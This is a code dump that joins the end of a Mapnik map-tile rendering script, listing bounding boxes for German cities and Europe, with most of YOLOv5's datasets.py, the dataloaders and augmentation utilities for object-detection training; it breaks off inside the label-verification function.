tile_dir = tile_dir + '/'
#-------------------------------------------------------------------------
#
# Change the following for different bounding boxes and zoom levels
#
# Start with an overview
# World
bbox = (-180.0,-90.0, 180.0,90.0)
render_tiles(bbox, mapfile, tile_dir, 0, 5, "World")
minZoom = 10
maxZoom = 16
bbox = (-2, 50.0,1.0,52.0)
render_tiles(bbox, mapfile, tile_dir, minZoom, maxZoom)
# Muenchen
bbox = (11.4,48.07, 11.7,48.22)
render_tiles(bbox, mapfile, tile_dir, 1, 12 , "Muenchen")
# Muenchen+
bbox = (11.3,48.01, 12.15,48.44)
render_tiles(bbox, mapfile, tile_dir, 7, 12 , "Muenchen+")
# Muenchen++
bbox = (10.92,47.7, 12.24,48.61)
render_tiles(bbox, mapfile, tile_dir, 7, 12 , "Muenchen++")
# Nuernberg
bbox=(10.903198,49.560441,49.633534,11.038085)
render_tiles(bbox, mapfile, tile_dir, 10, 16, "Nuernberg")
# Karlsruhe
bbox=(8.179113,48.933617,8.489252,49.081707)
render_tiles(bbox, mapfile, tile_dir, 10, 16, "Karlsruhe")
# Karlsruhe+
bbox = (8.3,48.95,8.5,49.05)
render_tiles(bbox, mapfile, tile_dir, 1, 16, "Karlsruhe+")
# Augsburg
bbox = (8.3,48.95,8.5,49.05)
render_tiles(bbox, mapfile, tile_dir, 1, 16, "Augsburg")
# Augsburg+
bbox=(10.773251,48.369594,10.883834,48.438577)
render_tiles(bbox, mapfile, tile_dir, 10, 14, "Augsburg+")
# Europe+
bbox = (1.0,10.0, 20.6,50.0)
render_tiles(bbox, mapfile, tile_dir, 1, 11 , "Europe+")
"""
|
datasets.py
|
# YOLOv5 dataset utils and dataloaders
import glob
import hashlib
import json
import logging
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool, Pool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import check_requirements, check_file, check_dataset, xywh2xyxy, xywhn2xyxy, xyxy2xywhn, \
xyn2xy, segments2boxes, clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp', 'mpo'] # acceptable image suffixes
VID_FORMATS = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
NUM_THREADS = min(8, os.cpu_count()) # number of multiprocessing threads
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
print(f'{i + 1}/{n}: {s}... ', end='')
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f" success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
self.imgs[i] = im if success else self.imgs[i] * 0
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == 0.4 and cache['hash'] == get_hash(self.label_files + self.img_files)
except:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
logging.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs, self.img_npy = [None] * n, [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
print(self.label_files)
with Pool(1) as pool:
pbar = tqdm(pool.imap_unordered(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
logging.info('\n'.join(msgs))
if nf == 0:
logging.info(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = 0.4 # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
logging.info(f'{prefix}New cache created: {path}')
except Exception as e:
logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, 'Image Not Found ' + path
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in IMG_FORMATS], []) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, corrupt
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
# if im.format.lower() in ('jpg', 'jpeg'):
# with open(im_file, 'rb') as f:
# f.seek(-2, 2)
# assert f.read() == b'\xff\xd9', 'corrupted JPEG'
# verify labels
segments = [] # instance segments
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
